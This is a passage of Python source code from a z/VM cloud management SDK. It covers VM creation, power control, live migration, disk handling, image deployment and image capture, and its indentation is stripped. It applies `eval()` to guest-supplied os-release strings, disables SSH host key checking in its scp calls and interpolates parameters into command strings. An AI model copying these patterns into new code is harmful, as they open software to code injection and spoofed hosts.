vdev = self.generate_disk_vdev(start_vdev=start_vdev,
offset=idx)
self._add_mdisk(userid, disk, vdev)
disk['vdev'] = vdev
if disk.get('disk_pool') is None:
disk['disk_pool'] = CONF.zvm.disk_pool
sizeUpper = disk.get('size').strip().upper()
sizeUnit = sizeUpper[-1]
if sizeUnit != 'G' and sizeUnit != 'M':
sizeValue = sizeUpper
disk_pool = disk.get('disk_pool')
[diskpool_type, diskpool_name] = disk_pool.split(':')
if (diskpool_type.upper() == 'ECKD'):
# Convert the cylinders to bytes
convert = 737280
else:
# Convert the blocks to bytes
convert = 512
byteSize = float(float(int(sizeValue) * convert / 1024) / 1024)
unit = "M"
if (byteSize > 1024):
byteSize = float(byteSize / 1024)
unit = "G"
byteSize = "%.1f" % byteSize
disk['size'] = byteSize + unit
return disk_list
def remove_mdisks(self, userid, vdev_list):
for vdev in vdev_list:
self._remove_mdisk(userid, vdev)
def dedicate_device(self, userid, vaddr, raddr, mode):
"""dedicate device
:userid: The name of the image obtaining a dedicated device
:vaddr: The virtual device number of the device
:raddr: A real device number to be dedicated or attached
to the specified image
:mode: Specify a 1 if the virtual device is to be in read-only mode.
Otherwise, specify a 0.
"""
# dedicate device to directory entry
self._dedicate_device(userid, vaddr, raddr, mode)
def _dedicate_device(self, userid, vaddr, raddr, mode):
"""dedicate device."""
action = 'dedicate'
rd = ('changevm %(uid)s %(act)s %(va)s %(ra)s %(mod)i' %
{'uid': userid, 'act': action,
'va': vaddr, 'ra': raddr, 'mod': mode})
action = "dedicate device to userid '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def get_fcp_info_by_status(self, userid, status):
"""get fcp information by the status.
:userid: The name of the image to query fcp info
:status: The status of target fcps. eg:'active', 'free' or 'offline'.
"""
results = self._get_fcp_info_by_status(userid, status)
return results
def _get_fcp_info_by_status(self, userid, status):
action = 'fcpinfo'
rd = ' '.join(['getvm', userid, action, status])
action = "query fcp info of '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
return results['response']
def undedicate_device(self, userid, vaddr):
"""undedicate device
:userid: The name of the image obtaining a dedicated device
:vaddr: The virtual device number of the device
"""
# undedicate device to directory entry
self._undedicate_device(userid, vaddr)
def _undedicate_device(self, userid, vaddr):
"""undedicate device."""
action = 'undedicate'
rd = ('changevm %(uid)s %(act)s %(va)s' %
{'uid': userid, 'act': action,
'va': vaddr})
action = "undedicate device from userid '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def get_image_performance_info(self, userid):
"""Get CPU and memory usage information.
:userid: the zvm userid to be queried
"""
pi_dict = self.image_performance_query([userid])
return pi_dict.get(userid, None)
def get_adapters_info(self, userid):
rd = ' '.join((
"SMAPI %s API Virtual_Network_Adapter_Query_Extended" % userid,
"--operands",
"-k 'image_device_number=*'"))
results = None
action = "get network info of userid '%s'" % str(userid)
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
ret = results['response']
# TODO: muti NIC support?
nic_count = 0
for line in ret:
if 'adapter_count=' in line:
nic_count = int(line.strip().split('=')[-1])
break
if nic_count < 1:
msg = 'get_network_info:No NIC found on userid %s' % userid
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
# save network info into dict by index from 1 to nic_count
# Firstly, get adapter information
adapters_info = []
adapter = dict()
# if found IP, no need to continue
found_mac = False
for line in ret:
if 'adapter_address=' in line:
adapter_addr = line.strip().split('=')[-1]
adapter['adapter_address'] = adapter_addr
if 'adapter_status=' in line:
adapter_type = line.strip().split('=')[-1]
adapter['adapter_status'] = adapter_type
if 'lan_owner=' in line:
lan_owner = line.strip().split('=')[-1]
adapter['lan_owner'] = lan_owner
if 'lan_name=' in line:
lan_name = line.strip().split('=')[-1]
adapter['lan_name'] = lan_name
if 'mac_address=' in line and not found_mac:
mac_addr = line.strip().split('=')[-1]
pattern = re.compile('.{2}')
mac_address = ':'.join(pattern.findall(mac_addr))
adapter['mac_address'] = mac_address
if 'mac_ip_version=' in line:
ip_version = line.strip().split('=')[-1]
adapter['mac_ip_version'] = ip_version
if 'mac_ip_address=' in line:
# once we found mac_ip_address, assume this is the MAC
# we are using, then jump to next adapter
mac_ip = line.strip().split('=')[-1]
adapter['mac_ip_address'] = mac_ip
found_mac = True
if 'adapter_info_end' in line:
adapters_info.append(adapter)
# clear adapter and process next
adapter = dict()
found_mac = False
return adapters_info
def _parse_vswitch_inspect_data(self, rd_list):
""" Parse the Virtual_Network_Vswitch_Query_Byte_Stats data to get
inspect data.
"""
def _parse_value(data_list, idx, keyword, offset):
return idx + offset, data_list[idx].rpartition(keyword)[2].strip()
vsw_dict = {}
with zvmutils.expect_invalid_resp_data():
# vswitch count
idx = 0
idx, vsw_count = _parse_value(rd_list, idx, 'vswitch count:', 2)
vsw_dict['vswitch_count'] = int(vsw_count)
# deal with each vswitch data
vsw_dict['vswitches'] = []
for i in range(vsw_dict['vswitch_count']):
vsw_data = {}
# skip vswitch number
idx += 1
# vswitch name
idx, vsw_name = _parse_value(rd_list, idx, 'vswitch name:', 1)
vsw_data['vswitch_name'] = vsw_name
# uplink count
idx, up_count = _parse_value(rd_list, idx, 'uplink count:', 1)
# skip uplink data
idx += int(up_count) * 9
# skip bridge data
idx += 8
# nic count
vsw_data['nics'] = []
idx, nic_count = _parse_value(rd_list, idx, 'nic count:', 1)
nic_count = int(nic_count)
for j in range(nic_count):
nic_data = {}
idx, nic_id = _parse_value(rd_list, idx, 'nic_id:', 1)
userid, toss, vdev = nic_id.partition(' ')
nic_data['userid'] = userid
nic_data['vdev'] = vdev
idx, nic_data['nic_fr_rx'] = _parse_value(rd_list, idx,
'nic_fr_rx:', 1
)
idx, nic_data['nic_fr_rx_dsc'] = _parse_value(rd_list, idx,
'nic_fr_rx_dsc:', 1
)
idx, nic_data['nic_fr_rx_err'] = _parse_value(rd_list, idx,
'nic_fr_rx_err:', 1
)
idx, nic_data['nic_fr_tx'] = _parse_value(rd_list, idx,
'nic_fr_tx:', 1
)
idx, nic_data['nic_fr_tx_dsc'] = _parse_value(rd_list, idx,
'nic_fr_tx_dsc:', 1
)
idx, nic_data['nic_fr_tx_err'] = _parse_value(rd_list, idx,
'nic_fr_tx_err:', 1
)
idx, nic_data['nic_rx'] = _parse_value(rd_list, idx,
'nic_rx:', 1
)
idx, nic_data['nic_tx'] = _parse_value(rd_list, idx,
'nic_tx:', 1
)
vsw_data['nics'].append(nic_data)
# vlan count
idx, vlan_count = _parse_value(rd_list, idx, 'vlan count:', 1)
# skip vlan data
idx += int(vlan_count) * 3
# skip the blank line
idx += 1
vsw_dict['vswitches'].append(vsw_data)
return vsw_dict
def _is_vdev_valid(self, vdev, vdev_info):
for used_vdev in vdev_info:
if (((int(vdev, 16) >= int(used_vdev, 16)) and
(int(vdev, 16) <= int(used_vdev, 16) + 2)) or
((int(vdev, 16) < int(used_vdev, 16)) and
(int(vdev, 16) >= int(used_vdev, 16) - 2))):
return False
return True
def get_power_state(self, userid):
"""Get power status of a z/VM instance."""
LOG.debug('Querying power stat of %s' % userid)
requestData = "PowerVM " + userid + " status"
action = "query power state of '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(requestData)
with zvmutils.expect_invalid_resp_data(results):
status = results['response'][0].partition(': ')[2]
return status
def _check_power_state(self, userid, action):
# Get the vm status
power_state = self.get_power_state(userid)
# Power on the vm if it is inactive
if power_state == 'off':
msg = ('The vm %s is powered off, please start up it '
'before %s' % (userid, action))
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
def guest_start(self, userid):
"""Power on VM."""
requestData = "PowerVM " + userid + " on"
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_stop(self, userid, **kwargs):
"""Power off VM."""
requestData = "PowerVM " + userid + " off"
if 'timeout' in kwargs.keys() and kwargs['timeout']:
requestData += ' --maxwait ' + str(kwargs['timeout'])
if 'poll_interval' in kwargs.keys() and kwargs['poll_interval']:
requestData += ' --poll ' + str(kwargs['poll_interval'])
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_softstop(self, userid, **kwargs):
"""Power off VM gracefully, it will call shutdown os then
deactivate vm"""
requestData = "PowerVM " + userid + " softoff --wait"
if 'timeout' in kwargs.keys() and kwargs['timeout']:
requestData += ' --maxwait ' + str(kwargs['timeout'])
else:
requestData += ' --maxwait ' + str(CONF.guest.softstop_timeout)
if 'poll_interval' in kwargs.keys() and kwargs['poll_interval']:
requestData += ' --poll ' + str(kwargs['poll_interval'])
else:
requestData += ' --poll ' + str(CONF.guest.softstop_interval)
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_pause(self, userid):
self._check_power_state(userid, 'pause')
requestData = "PowerVM " + userid + " pause"
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_unpause(self, userid):
self._check_power_state(userid, 'unpause')
requestData = "PowerVM " + userid + " unpause"
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_reboot(self, userid):
requestData = ' '.join(("PowerVM", userid, "reboot"))
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_reset(self, userid):
requestData = ' '.join(("PowerVM", userid, "reset"))
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def live_migrate_move(self, userid, destination, parms):
""" moves the specified virtual machine, while it continues to run,
to the specified system within the SSI cluster. """
rd = ('migratevm %(uid)s move --destination %(dest)s ' %
{'uid': userid, 'dest': destination})
if 'maxtotal' in parms:
rd += ('--maxtotal ' + str(parms['maxTotal']))
if 'maxquiesce' in parms:
rd += ('--maxquiesce ' + str(parms['maxquiesce']))
if 'immediate' in parms:
rd += " --immediate"
if 'forcearch' in parms:
rd += " --forcearch"
if 'forcedomain' in parms:
rd += " --forcedomain"
if 'forcestorage' in parms:
rd += " --forcestorage"
action = "move userid '%s' to SSI '%s'" % (userid, destination)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
msg = ''
if action is not None:
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
def live_migrate_test(self, userid, destination):
""" tests the specified virtual machine and reports whether or not
it is eligible to be relocated to the specified system. """
rd = ('migratevm %(uid)s test --destination %(dest)s ' %
{'uid': userid, 'dest': destination})
action = "test to move userid '%s' to SSI '%s'" % (userid, destination)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
msg = ''
if action is not None:
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
def _get_ipl_param(self, ipl_from):
if len(ipl_from) > 0:
ipl_param = ipl_from
else:
ipl_param = CONF.zvm.user_root_vdev
return ipl_param
def create_vm(self, userid, cpu, memory, disk_list, profile,
max_cpu, max_mem, ipl_from, ipl_param, ipl_loadparam,
dedicate_vdevs, loaddev):
""" Create VM and add disks if specified. """
rd = ('makevm %(uid)s directory LBYONLY %(mem)im %(pri)s '
'--cpus %(cpu)i --profile %(prof)s --maxCPU %(max_cpu)i '
'--maxMemSize %(max_mem)s --setReservedMem' %
{'uid': userid, 'mem': memory,
'pri': const.ZVM_USER_DEFAULT_PRIVILEGE,
'cpu': cpu, 'prof': profile,
'max_cpu': max_cpu, 'max_mem': max_mem})
if CONF.zvm.default_admin_userid:
rd += (' --logonby "%s"' % CONF.zvm.default_admin_userid)
# when use dasd as root disk, the disk_list[0] would be the boot
# disk.
# when boot from volume, ipl_from should be specified explicitly.
if (disk_list and 'is_boot_disk' in disk_list[0] and
disk_list[0]['is_boot_disk']) or ipl_from:
# we assume at least one disk exist, which means, is_boot_disk
# is true for exactly one disk.
rd += (' --ipl %s' % self._get_ipl_param(ipl_from))
# load param for ipl
if ipl_param:
rd += ' --iplParam %s' % ipl_param
if ipl_loadparam:
rd += ' --iplLoadparam %s' % ipl_loadparam
if dedicate_vdevs:
rd += ' --dedicate "%s"' % " ".join(dedicate_vdevs)
if loaddev:
if 'portname' in loaddev:
rd += ' --loadportname %s' % loaddev['portname']
if 'lun' in loaddev:
rd += ' --loadlun %s' % loaddev['lun']
action = "create userid '%s'" % userid
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
if ((err.results['rc'] == 436) and (err.results['rs'] == 4)):
result = "Profile '%s'" % profile
raise exception.SDKObjectNotExistError(obj_desc=result,
modID='guest')
else:
msg = ''
if action is not None:
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
# Add the guest to db immediately after user created
action = "add guest '%s' to database" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
self._GuestDbOperator.add_guest(userid)
# Continue to add disk
if disk_list:
# Add disks for vm
return self.add_mdisks(userid, disk_list)
def _add_mdisk(self, userid, disk, vdev):
"""Create one disk for userid
NOTE: No read, write and multi password specified, and
access mode default as 'MR'.
"""
size = disk['size']
fmt = disk.get('format', 'ext4')
disk_pool = disk.get('disk_pool') or CONF.zvm.disk_pool
[diskpool_type, diskpool_name] = disk_pool.split(':')
if (diskpool_type.upper() == 'ECKD'):
action = 'add3390'
else:
action = 'add9336'
rd = ' '.join(['changevm', userid, action, diskpool_name,
vdev, size, '--mode MR'])
if fmt and fmt != 'none':
rd += (' --filesystem %s' % fmt.lower())
action = "add mdisk to userid '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def get_vm_list(self):
"""Get the list of guests that are created by SDK
return userid list"""
action = "list all guests in database"
with zvmutils.log_and_reraise_sdkbase_error(action):
guests_in_db = self._GuestDbOperator.get_guest_list()
guests_migrated = \
self._GuestDbOperator.get_migrated_guest_info_list()
# db query return value in tuple (uuid, userid, metadata, comments)
userids_in_db = [g[1].upper() for g in guests_in_db]
userids_migrated = [g[1].upper() for g in guests_migrated]
userid_list = list(set(userids_in_db) - set(userids_migrated))
return userid_list
def _remove_mdisk(self, userid, vdev):
rd = ' '.join(('changevm', userid, 'removedisk', vdev))
action = "remove disk with vdev '%s' from userid '%s'" % (vdev, userid)
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def guest_authorize_iucv_client(self, userid, client=None):
"""Punch a script that used to set the authorized client userid in vm
If the guest is in log off status, the change will take effect when
the guest start up at first time.
If the guest is in active status, power off and power on are needed
for the change to take effect.
:param str guest: the user id of the vm
:param str client: the user id of the client that can communicate to
guest using IUCV"""
client = client or zvmutils.get_smt_userid()
iucv_path = "/tmp/" + userid
if not os.path.exists(iucv_path):
os.makedirs(iucv_path)
iucv_auth_file = iucv_path + "/iucvauth.sh"
zvmutils.generate_iucv_authfile(iucv_auth_file, client)
try:
requestData = "ChangeVM " + userid + " punchfile " + \
iucv_auth_file + " --class x"
self._request(requestData)
except exception.SDKSMTRequestFailed as err:
msg = ("Failed to punch IUCV auth file to userid '%s'. SMT error:"
" %s" % (userid, err.format_message()))
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
finally:
self._pathutils.clean_temp_folder(iucv_path)
def volume_refresh_bootmap(self, fcpchannels, wwpns, lun, skipzipl=False):
""" Refresh bootmap info of specific volume.
: param fcpchannels: list of fcpchannels.
: param wwpns: list of wwpns.
: param lun: string of lun.
: return value: list of FCP devices and physical wwpns.
"""
fcps = ','.join(fcpchannels)
ws = ','.join(wwpns)
fcs = "--fcpchannel=%s" % fcps
wwpns = "--wwpn=%s" % ws
lun = "--lun=%s" % lun
if skipzipl:
skipzipl = "--skipzipl=YES"
cmd = ['sudo', '/opt/zthin/bin/refresh_bootmap', fcs, wwpns, lun,
skipzipl]
else:
cmd = ['sudo', '/opt/zthin/bin/refresh_bootmap', fcs, wwpns, lun]
LOG.info("Running command: %s", cmd)
with zvmutils.expect_and_reraise_internal_error(
modID='refresh_bootmap'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("refresh_bootmap failed with return code: %d." % rc)
err_output = ""
output_lines = output.split('\n')
for line in output_lines:
if line.__contains__("ERROR:"):
err_output += ("\\n" + line.strip())
LOG.error(err_msg + err_output)
raise exception.SDKVolumeOperationError(rs=5,
errcode=rc,
errmsg=err_output)
output_lines = output.split('\n')
res_wwpns = []
res_fcps = []
for line in output_lines:
if line.__contains__("WWPNs: "):
wwpns = line[7:]
# Convert string to list by space
res_wwpns = wwpns.split()
if line.__contains__("FCPs: "):
fcps = line[6:]
# Convert string to list by space
res_fcps = fcps.split()
return res_wwpns, res_fcps
def guest_deploy(self, userid, image_name, transportfiles=None,
remotehost=None, vdev=None, skipdiskcopy=False):
""" Deploy image and punch config driver to target """
# (TODO: add the support of multiple disks deploy)
if skipdiskcopy:
msg = ('Start guest_deploy without unpackdiskimage, guest: %(vm)s'
'os_version: %(img)s' % {'img': image_name, 'vm': userid})
LOG.info(msg)
else:
msg = ('Start to deploy image %(img)s to guest %(vm)s'
% {'img': image_name, 'vm': userid})
LOG.info(msg)
image_file = '/'.join([self._get_image_path_by_name(image_name),
CONF.zvm.user_root_vdev])
# Unpack image file to root disk
vdev = vdev or CONF.zvm.user_root_vdev
cmd = ['sudo', '/opt/zthin/bin/unpackdiskimage', userid, vdev,
image_file]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("unpackdiskimage failed with return code: %d." % rc)
err_output = ""
output_lines = output.split('\n')
for line in output_lines:
if line.__contains__("ERROR:"):
err_output += ("\\n" + line.strip())
LOG.error(err_msg + err_output)
raise exception.SDKGuestOperationError(rs=3, userid=userid,
unpack_rc=rc,
err=err_output)
# Purge guest reader to clean dirty data
rd = ("changevm %s purgerdr" % userid)
action = "purge reader of '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
# Punch transport files if specified
if transportfiles:
# Copy transport file to local
msg = ('Start to send customized file to vm %s' % userid)
LOG.info(msg)
try:
tmp_trans_dir = tempfile.mkdtemp()
local_trans = '/'.join([tmp_trans_dir,
os.path.basename(transportfiles)])
if remotehost:
cmd = ["/usr/bin/scp", "-B",
"-P", CONF.zvm.remotehost_sshd_port,
"-o StrictHostKeyChecking=no",
("%s:%s" % (remotehost, transportfiles)),
local_trans]
else:
cmd = ["/usr/bin/cp", transportfiles, local_trans]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ('copy config drive with command %(cmd)s '
'failed with output: %(res)s' %
{'cmd': str(cmd), 'res': output})
LOG.error(err_msg)
raise exception.SDKGuestOperationError(rs=4, userid=userid,
err_info=err_msg)
# Punch config drive to guest userid
rd = ("changevm %(uid)s punchfile %(file)s --class X" %
{'uid': userid, 'file': local_trans})
action = "punch config drive to userid '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
finally:
# remove the local temp config drive folder
self._pathutils.clean_temp_folder(tmp_trans_dir)
# Authorize iucv client
self.guest_authorize_iucv_client(userid)
# Update os version in guest metadata
# TODO: may should append to old metadata, not replace
if skipdiskcopy:
os_version = image_name
else:
image_info = self._ImageDbOperator.image_query_record(image_name)
os_version = image_info[0]['imageosdistro']
metadata = 'os_version=%s' % os_version
self._GuestDbOperator.update_guest_by_userid(userid, meta=metadata)
if skipdiskcopy:
msg = ('guest_deploy without unpackdiskimage finish successfully, '
'guest: %(vm)s, os_version: %(img)s'
% {'img': image_name, 'vm': userid})
else:
msg = ('Deploy image %(img)s to guest %(vm)s disk %(vdev)s'
' successfully' % {'img': image_name, 'vm': userid,
'vdev': vdev})
LOG.info(msg)
def guest_deploy_rhcos(self, userid, image_name, transportfiles,
remotehost=None, vdev=None, hostname=None,
skipdiskcopy=False):
""" Deploy image"""
# (TODO: add the support of multiple disks deploy)
if transportfiles is None:
err_msg = 'Ignition file is required when deploying RHCOS image'
LOG.error(err_msg)
raise exception.SDKGuestOperationError(rs=13, userid=userid)
if skipdiskcopy:
msg = ('Start guest_deploy without copy disk, guest: %(vm)s'
'os_version: %(img)s' % {'img': image_name, 'vm': userid})
LOG.info(msg)
image_file = None
else:
msg = ('Start to deploy image %(img)s to guest %(vm)s'
% {'img': image_name, 'vm': userid})
LOG.info(msg)
image_file = '/'.join([self._get_image_path_by_name(image_name),
CONF.zvm.user_root_vdev])
# Unpack image file to root disk
vdev = vdev or CONF.zvm.user_root_vdev
tmp_trans_dir = None
try:
if remotehost:
# download igintion file from remote host
tmp_trans_dir = tempfile.mkdtemp()
local_trans = '/'.join([tmp_trans_dir,
os.path.basename(transportfiles)])
cmd = ["/usr/bin/scp", "-B",
"-P", CONF.zvm.remotehost_sshd_port,
"-o StrictHostKeyChecking=no",
("%s:%s" % (remotehost, transportfiles)),
local_trans]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ('copy ignition file with command %(cmd)s '
'failed with output: %(res)s' %
{'cmd': str(cmd), 'res': output})
LOG.error(err_msg)
raise exception.SDKGuestOperationError(rs=4, userid=userid,
err_info=err_msg)
transportfiles = local_trans
cmd = self._get_unpackdiskimage_cmd_rhcos(userid, image_name,
transportfiles, vdev,
image_file, hostname,
skipdiskcopy)
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("unpackdiskimage failed with return code: %d." % rc)
err_output = ""
output_lines = output.split('\n')
for line in output_lines:
if line.__contains__("ERROR:"):
err_output += ("\\n" + line.strip())
LOG.error(err_msg + err_output)
raise exception.SDKGuestOperationError(rs=3, userid=userid,
unpack_rc=rc,
err=err_output)
finally:
# remove the temp ignition file
if tmp_trans_dir:
self._pathutils.clean_temp_folder(tmp_trans_dir)
# Update os version in guest metadata
# TODO: may should append to old metadata, not replace
if skipdiskcopy:
os_version = image_name
else:
os_version = self.image_get_os_distro(image_name)
metadata = 'os_version=%s' % os_version
self._GuestDbOperator.update_guest_by_userid(userid, meta=metadata)
if skipdiskcopy:
msg = ('guest_deploy without copy disk finish successfully, '
'guest: %(vm)s, os_version: %(img)s'
% {'img': image_name, 'vm': userid})
else:
msg = ('Deploy image %(img)s to guest %(vm)s disk %(vdev)s'
' successfully' % {'img': image_name, 'vm': userid,
'vdev': vdev})
LOG.info(msg)
def guest_capture(self, userid, image_name, capture_type='rootonly',
compress_level=6):
if capture_type == "alldisks":
func = ('Capture guest with type: %s' % capture_type)
msg = ('%s is not supported in current release' % func)
LOG.error(msg)
raise exception.SDKFunctionNotImplementError(func=func,
modID='guest')
msg = ('Start to capture %(vm)s to generate image %(img)s with '
'capture type %(type)s' % {'vm': userid,
'img': image_name,
'type': capture_type})
LOG.info(msg)
self._check_power_state(userid, 'capture')
# Make sure the iucv channel is ready for communication on source vm
try:
self.execute_cmd(userid, 'pwd')
except exception.SDKSMTRequestFailed as err:
msg = ('Failed to check iucv status on capture source vm '
'%(vm)s with error %(err)s' % {'vm': userid,
'err': err.results['response'][0]})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
# Get the os version of the vm
try:
os_version = self._guest_get_os_version(userid)
except exception.SDKSMTRequestFailed as err:
msg = ('Failed to execute command on capture source vm %(vm)s'
'to get os version with error %(err)s' % {'vm': userid,
'err': err.results['response'][0]})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
except Exception as err:
msg = ('Error happened when parsing os version on source vm '
'%(vm)s with error: %(err)s' % {'vm': userid,
'err': six.text_type(err)})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
msg = ('The os version of capture source vm %(vm)s is %(version)s' %
{'vm': userid,
'version': os_version})
LOG.info(msg)
# Find the root device according to the capture type
try:
capture_devices = self._get_capture_devices(userid, capture_type)
except exception.SDKSMTRequestFailed as err:
msg = ('Failed to execute command on source vm %(vm)s to get the '
'devices for capture with error %(err)s' % {'vm': userid,
'err': err.results['response'][0]})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
except Exception as err:
msg = ('Internal error happened when getting the devices for '
'capture on source vm %(vm)s with error %(err)s' %
{'vm': userid,
'err': six.text_type(err)})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
except exception.SDKGuestOperationError:
raise
# Shutdown the vm before capture
self.guest_softstop(userid)
# Prepare directory for writing image file
image_temp_dir = '/'.join((CONF.image.sdk_image_repository,
const.IMAGE_TYPE['CAPTURE'],
os_version,
image_name))
self._pathutils.mkdir_if_not_exist(image_temp_dir)
# Call creatediskimage to capture a vm to generate an image
# TODO:(nafei) to support multiple disk capture
vdev = capture_devices[0]
msg = ('Found the device %(vdev)s of %(vm)s for capture' %
{'vdev': vdev, 'vm': userid})
LOG.info(msg)
image_file_name = vdev
image_file_path = '/'.join((image_temp_dir, image_file_name))
cmd = ['sudo', '/opt/zthin/bin/creatediskimage', userid, vdev,
image_file_path, '--compression', str(compress_level)]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("creatediskimage failed with return code: %d." % rc)
err_output = ""
output_lines = output.split('\n')
for line in output_lines:
if line.__contains__("ERROR:"):
err_output += ("\\n" + line.strip())
LOG.error(err_msg + err_output)
self._pathutils.clean_temp_folder(image_temp_dir)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=err_output)
# Move the generated image to netboot folder
image_final_dir = '/'.join([CONF.image.sdk_image_repository,
const.IMAGE_TYPE['DEPLOY'],
os_version,
image_name])
image_final_path = '/'.join((image_final_dir,
image_file_name))
self._pathutils.mkdir_if_not_exist(image_final_dir)
cmd = ['mv', image_file_path, image_final_path]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("move image file from staging to netboot "
"folder failed with return code: %d." % rc)
LOG.error(err_msg)
self._pathutils.clean_temp_folder(image_temp_dir)
self._pathutils.clean_temp_folder(image_final_dir)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
err=err_msg)
self._pathutils.clean_temp_folder(image_temp_dir)
msg = ('Updating the metadata for captured image %s ' % image_name)
LOG.info(msg)
# Get md5sum of image
real_md5sum = self._get_md5sum(image_final_path)
# Get disk_size_units of image
disk_size_units = self._get_disk_size_units(image_final_path)
# Get the image physical size
image_size = self._get_image_size(image_final_path)
# Create the image record in image database
self._ImageDbOperator.image_add_record(image_name, os_version,
real_md5sum, disk_size_units, image_size,
capture_type)
LOG.info('Image %s is captured and imported to image repository '
'successfully' % image_name)
def _guest_get_os_version(self, userid):
os_version = ''
release_file = self.execute_cmd(userid, 'ls /etc/*-release')
if '/etc/os-release' in release_file:
# Parse os-release file, part of the output looks like:
# NAME="Red Hat Enterprise Linux Server"
# ID="rhel"
# VERSION_ID="7.0"
release_info = self.execute_cmd(userid, 'cat /etc/os-release')
release_dict = {}
for item in release_info:
if item:
release_dict[item.split('=')[0]] = item.split('=')[1]
distro = release_dict['ID']
version = release_dict['VERSION_ID']
if '"' in distro:
distro = eval(distro)
if '"' in version:
version = eval(version)
os_version = '%s%s' % (distro, version)
return os_version
elif '/etc/redhat-release' in release_file:
# The output looks like:
# "Red Hat Enterprise Linux Server release 6.7 (Santiago)"
distro = 'rhel'
release_info = self.execute_cmd(userid, 'cat /etc/redhat-release')
distro_version = release_info[0].split()[6]
os_version = ''.join((distro, distro_version))
return os_version
elif '/etc/SuSE-release' in release_file:
# The output for this file looks like:
# SUSE Linux Enterprise Server 11 (s390x)
# VERSION = 11
# PATCHLEVEL = 3
distro = 'sles'
release_info = self.execute_cmd(userid, 'cat /etc/SuSE-release')
LOG.debug('OS release info is %s' % release_info)
release_version = '.'.join((release_info[1].split('=')[1].strip(),
release_info[2].split('=')[1].strip()))
os_version = ''.join((distro, release_version))
return os_version
elif '/etc/system-release' in release_file:
# For some rhel6.7 system, it only have system-release file and
# the output looks like:
# "Red Hat Enterprise Linux Server release 6.7 (Santiago)"
distro = 'rhel'
release_info = self.execute_cmd(userid, 'cat /etc/system-release')
distro_version = release_info[0].split()[6]
os_version = ''.join((distro, distro_version))
return os_version
def _get_capture_devices(self, userid, capture_type='rootonly'):
capture_devices = []
if capture_type == 'rootonly':
# Parse the /proc/cmdline to get root devices
proc_cmdline = self.execute_cmd(userid, 'cat /proc/cmdline '
'| tr " " "\\n" | grep -a "^root=" | cut -c6-')
root_device_info = proc_cmdline[0]
if not root_device_info:
msg = ('Unable to get useful info from /proc/cmdline to '
'locate the device associated with the root directory '
'on capture source vm %s' % userid)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
else:
if 'UUID=' in root_device_info:
uuid = root_device_info.split()[0].split('=')[1]
root_device = '/'.join(('/dev/disk/by-uuid', uuid))
elif 'LABEL=' in root_device_info:
label = root_device_info.split()[0].split('=')[1]
root_device = '/'.join(('/dev/disk/by-label', label))
elif 'mapper' in root_device_info:
msg = ('Capturing a disk with root filesystem on logical'
' volume is not supported')
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
else:
root_device = root_device_info
root_device_node = self.execute_cmd(userid, 'readlink -f %s' %
root_device)[0]
# Get device node vdev by node name
cmd = ('cat /proc/dasd/devices | grep -i "is %s" ' %
root_device_node.split('/')[-1].rstrip(string.digits))
result = self.execute_cmd(userid, cmd)[0]
root_device_vdev = result.split()[0][4:8]
capture_devices.append(root_device_vdev)
return capture_devices
else:
# For sysclone, parse the user directory entry to get the devices
# for capture, leave for future
pass
def _get_unpackdiskimage_cmd_rhcos(self, userid, image_name,
transportfiles=None, vdev=None,
